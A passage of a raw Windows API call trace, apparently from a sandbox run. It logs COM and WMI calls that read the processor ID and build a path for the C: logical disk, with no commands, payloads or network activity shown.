returned 0x2 [0066.095] CoTaskMemFree (pv=0x6fa0e8) [0066.095] CoGetContextToken (in: pToken=0x26cc70 | out: pToken=0x26cc70) returned 0x0 [0066.095] IUnknown:AddRef (This=0x5222090) returned 0x3 [0066.095] IWbemClassObject:Get (in: This=0x5222090, wszName="__GENUS", lFlags=0, pVal=0x26cf84*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26d004*=0, plFlavor=0x26d000*=0 | out: pVal=0x26cf84*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x26d004*=3, plFlavor=0x26d000*=64) returned 0x0 [0066.096] IWbemClassObject:Get (in: This=0x5222090, wszName="__PATH", lFlags=0, pVal=0x26cf68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26cfec*=0, plFlavor=0x26cfe8*=0 | out: pVal=0x26cf68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x26cfec*=8, plFlavor=0x26cfe8*=64) returned 0x0 [0066.096] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6c [0066.096] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x6c [0066.096] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cf94 | out: ppv=0x26cf94*=0x6ded34) returned 0x0 [0066.096] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cf8c | out: pAptType=0x26cf8c*=1) returned 0x0 [0066.096] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cf90 | out: ppvObject=0x26cf90*=0x0) returned 0x80004002 [0066.096] IUnknown:Release (This=0x6ded34) returned 0x1 [0066.097] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c900 | out: ppv=0x26c900*=0x5222080) returned 0x0 [0066.097] WbemDefPath:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cb18 | out: ppvObject=0x26cb18*=0x0) returned 0x80004002 [0066.097] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5222080, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cb2c | out: ppvObject=0x26cb2c*=0x5226d78) returned 0x0 [0066.098] WbemDefPath:IUnknown:Release (This=0x5222080) returned 0x0 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c74c | out: ppvObject=0x26c74c*=0x5226d78) returned 0x0 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c708 | out: ppvObject=0x26c708*=0x0) returned 0x80004002 [0066.098] WbemDefPath:IUnknown:AddRef (This=0x5226d78) returned 0x3 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c064 | out: ppvObject=0x26c064*=0x0) returned 0x80004002 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c014 | out: ppvObject=0x26c014*=0x0) returned 0x80004002 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c020 | out: ppvObject=0x26c020*=0x6fa0e8) returned 0x0 [0066.098] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6fa0e8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c028 | out: pCid=0x26c028*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0066.098] WbemDefPath:IUnknown:Release (This=0x6fa0e8) returned 0x3 [0066.098] CoGetContextToken (in: pToken=0x26c080 | out: pToken=0x26c080) returned 0x0 [0066.098] CoGetContextToken (in: pToken=0x26c488 | out: pToken=0x26c488) returned 0x0 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c518 | out: ppvObject=0x26c518*=0x0) returned 0x80004002 [0066.098] WbemDefPath:IUnknown:Release (This=0x5226d78) returned 0x2 [0066.098] WbemDefPath:IUnknown:Release (This=0x5226d78) returned 0x1 [0066.098] CoGetContextToken (in: pToken=0x26ce10 | out: pToken=0x26ce10) returned 0x0 [0066.098] CoGetContextToken (in: pToken=0x26cd70 | out: pToken=0x26cd70) returned 0x0 [0066.098] WbemDefPath:IUnknown:QueryInterface (in: This=0x5226d78, riid=0x26ce40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26ce3c | out: ppvObject=0x26ce3c*=0x5226d78) returned 0x0 [0066.099] WbemDefPath:IUnknown:AddRef (This=0x5226d78) returned 0x3 [0066.099] WbemDefPath:IUnknown:Release (This=0x5226d78) returned 0x2 [0066.099] WbemDefPath:IWbemPath:SetText (This=0x5226d78, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cfc0 | out: puCount=0x26cfc0*=0x2) returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cfbc*=0x0, pszText=0x0 | out: puBuffLength=0x26cfbc*=0xf, pszText=0x0) returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cfbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cfbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cfa0 | out: puCount=0x26cfa0*=0x2) returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf9c*=0x0, pszText=0x0 | out: puBuffLength=0x26cf9c*=0xf, pszText=0x0) returned 0x0 [0066.099] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.100] IWbemClassObject:Get (in: This=0x5222090, wszName="processorID", lFlags=0, pVal=0x26cf9c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2280f24*=0, plFlavor=0x2280f28*=0 | out: pVal=0x26cf9c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x2280f24*=8, plFlavor=0x2280f28*=0) returned 0x0 [0066.100] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0066.100] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0066.100] IWbemClassObject:Get (in: This=0x5222090, wszName="processorID", lFlags=0, pVal=0x26cfa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2280f24*=8, plFlavor=0x2280f28*=0 | out: pVal=0x26cfa4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0F8BFBFF00050654", varVal2=0x0), pType=0x2280f24*=8, plFlavor=0x2280f28*=0) returned 0x0 [0066.100] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0066.100] SysStringByteLen (bstr="0F8BFBFF00050654") returned 0x20 [0066.104] CoGetContextToken (in: pToken=0x26cec0 | out: pToken=0x26cec0) returned 0x0 [0066.104] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x1 [0066.104] IUnknown:Release (This=0x5222044) returned 0x0 [0066.105] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cfb8 | out: ppv=0x26cfb8*=0x6ded34) returned 0x0 [0066.105] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cfb0 | out: pAptType=0x26cfb0*=1) returned 0x0 [0066.105] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cfb4 | out: ppvObject=0x26cfb4*=0x0) returned 0x80004002 [0066.105] IUnknown:Release (This=0x6ded34) returned 0x1 [0066.106] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c920 | out: ppv=0x26c920*=0x5221fb8) returned 0x0 [0066.106] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fb8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cb38 | out: ppvObject=0x26cb38*=0x0) returned 0x80004002 [0066.106] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5221fb8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cb4c | out: ppvObject=0x26cb4c*=0x5221fc8) returned 0x0 [0066.106] WbemDefPath:IUnknown:Release (This=0x5221fb8) returned 0x0 [0066.106] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c76c | out: ppvObject=0x26c76c*=0x5221fc8) returned 0x0 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c728 | out: ppvObject=0x26c728*=0x0) returned 0x80004002 [0066.107] WbemDefPath:IUnknown:AddRef (This=0x5221fc8) returned 0x3 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c084 | out: ppvObject=0x26c084*=0x0) returned 0x80004002 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c034 | out: ppvObject=0x26c034*=0x0) returned 0x80004002 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c040 | out: ppvObject=0x26c040*=0x6fa138) returned 0x0 [0066.107] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6fa138, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c048 | out: pCid=0x26c048*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0066.107] WbemDefPath:IUnknown:Release (This=0x6fa138) returned 0x3 [0066.107] CoGetContextToken (in: pToken=0x26c0a0 | out: pToken=0x26c0a0) returned 0x0 [0066.107] CoGetContextToken (in: pToken=0x26c4a8 | out: pToken=0x26c4a8) returned 0x0 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c538 | out: ppvObject=0x26c538*=0x0) returned 0x80004002 [0066.107] WbemDefPath:IUnknown:Release (This=0x5221fc8) returned 0x2 [0066.107] WbemDefPath:IUnknown:Release (This=0x5221fc8) returned 0x1 [0066.107] CoGetContextToken (in: pToken=0x26ce30 | out: pToken=0x26ce30) returned 0x0 [0066.107] CoGetContextToken (in: pToken=0x26cd90 | out: pToken=0x26cd90) returned 0x0 [0066.107] WbemDefPath:IUnknown:QueryInterface (in: This=0x5221fc8, riid=0x26ce60*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26ce5c | out: ppvObject=0x26ce5c*=0x5221fc8) returned 0x0 [0066.107] WbemDefPath:IUnknown:AddRef (This=0x5221fc8) returned 0x3 [0066.107] WbemDefPath:IUnknown:Release (This=0x5221fc8) returned 0x2 [0066.108] WbemDefPath:IWbemPath:SetText (This=0x5221fc8, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5221fc8, puCount=0x26cfe4 | out: puCount=0x26cfe4*=0x0) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfe0*=0x0, pszText=0x0 | out: puBuffLength=0x26cfe0*=0x20, pszText=0x0) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfe0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x26cfe0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetInfo (in: This=0x5221fc8, uRequestedInfo=0x0, puResponse=0x26cfec | out: puResponse=0x26cfec*=0xc19) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5221fc8, puCount=0x26cfe4 | out: puCount=0x26cfe4*=0x0) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetInfo (in: This=0x5221fc8, uRequestedInfo=0x0, puResponse=0x26cfec | out: puResponse=0x26cfec*=0xc19) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetInfo (in: This=0x5221fc8, uRequestedInfo=0x0, puResponse=0x26cfec | out: puResponse=0x26cfec*=0xc19) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5221fc8, puCount=0x26cf64 | out: puCount=0x26cf64*=0x0) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26cf50 | out: puCount=0x26cf50*=0x2) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26cf4c*=0x0, pszText=0x0 | out: puBuffLength=0x26cf4c*=0xf, pszText=0x0) returned 0x0 [0066.108] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26cf4c*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf4c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.108] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cf00 | out: ppv=0x26cf00*=0x6ded34) returned 0x0 [0066.108] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cef8 | out: pAptType=0x26cef8*=1) returned 0x0 [0066.108] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cefc | out: ppvObject=0x26cefc*=0x0) returned 0x80004002 [0066.108] IUnknown:Release (This=0x6ded34) returned 0x1 [0066.109] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c868 | out: ppv=0x26c868*=0x5222070) returned 0x0 [0066.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x5222070, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26ca80 | out: ppvObject=0x26ca80*=0x0) returned 0x80004002 [0066.109] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5222070, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca94 | out: ppvObject=0x26ca94*=0x5227410) returned 0x0 [0066.109] WbemDefPath:IUnknown:Release (This=0x5222070) returned 0x0 [0066.109] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b4 | out: ppvObject=0x26c6b4*=0x5227410) returned 0x0 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c670 | out: ppvObject=0x26c670*=0x0) returned 0x80004002 [0066.110] WbemDefPath:IUnknown:AddRef (This=0x5227410) returned 0x3 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26bfcc | out: ppvObject=0x26bfcc*=0x0) returned 0x80004002 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26bf7c | out: ppvObject=0x26bf7c*=0x0) returned 0x80004002 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf88 | out: ppvObject=0x26bf88*=0x6fa0b8) returned 0x0 [0066.110] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6fa0b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26bf90 | out: pCid=0x26bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0066.110] WbemDefPath:IUnknown:Release (This=0x6fa0b8) returned 0x3 [0066.110] CoGetContextToken (in: pToken=0x26bfe8 | out: pToken=0x26bfe8) returned 0x0 [0066.110] CoGetContextToken (in: pToken=0x26c3f0 | out: pToken=0x26c3f0) returned 0x0 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002 [0066.110] WbemDefPath:IUnknown:Release (This=0x5227410) returned 0x2 [0066.110] WbemDefPath:IUnknown:Release (This=0x5227410) returned 0x1 [0066.110] CoGetContextToken (in: pToken=0x26cd78 | out: pToken=0x26cd78) returned 0x0 [0066.110] CoGetContextToken (in: pToken=0x26ccd8 | out: pToken=0x26ccd8) returned 0x0 [0066.110] WbemDefPath:IUnknown:QueryInterface (in: This=0x5227410, riid=0x26cda8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26cda4 | out: ppvObject=0x26cda4*=0x5227410) returned 0x0 [0066.110] WbemDefPath:IUnknown:AddRef (This=0x5227410) returned 0x3 [0066.111] WbemDefPath:IUnknown:Release (This=0x5227410) returned 0x2 [0066.111] WbemDefPath:IWbemPath:SetText (This=0x5227410, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0066.111] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5227410, puCount=0x26cf28 | out: puCount=0x26cf28*=0x2) returned 0x0 [0066.111] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=4, puBuffLength=0x26cf24*=0x0, pszText=0x0 | out: puBuffLength=0x26cf24*=0xf, pszText=0x0) returned 0x0 [0066.111] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=4, puBuffLength=0x26cf24*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf24*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.111] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cf28 | out: ppv=0x26cf28*=0x6ded34) returned 0x0 [0066.111] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cf20 | out: pAptType=0x26cf20*=1) returned 0x0 [0066.111] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cf24 | out: ppvObject=0x26cf24*=0x0) returned 0x80004002 [0066.111] IUnknown:Release (This=0x6ded34) returned 0x1 [0066.112] CoGetClassObject (in: rclsid=0x700854*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cb48 | out: ppv=0x26cb48*=0x5226ff8) returned 0x0 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5226ff8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cd60 | out: ppvObject=0x26cd60*=0x0) returned 0x80004002 [0066.112] WbemLocator:IClassFactory:CreateInstance (in: This=0x5226ff8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd74 | out: ppvObject=0x26cd74*=0x5222080) returned 0x0 [0066.112] WbemLocator:IUnknown:Release (This=0x5226ff8) returned 0x0 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, 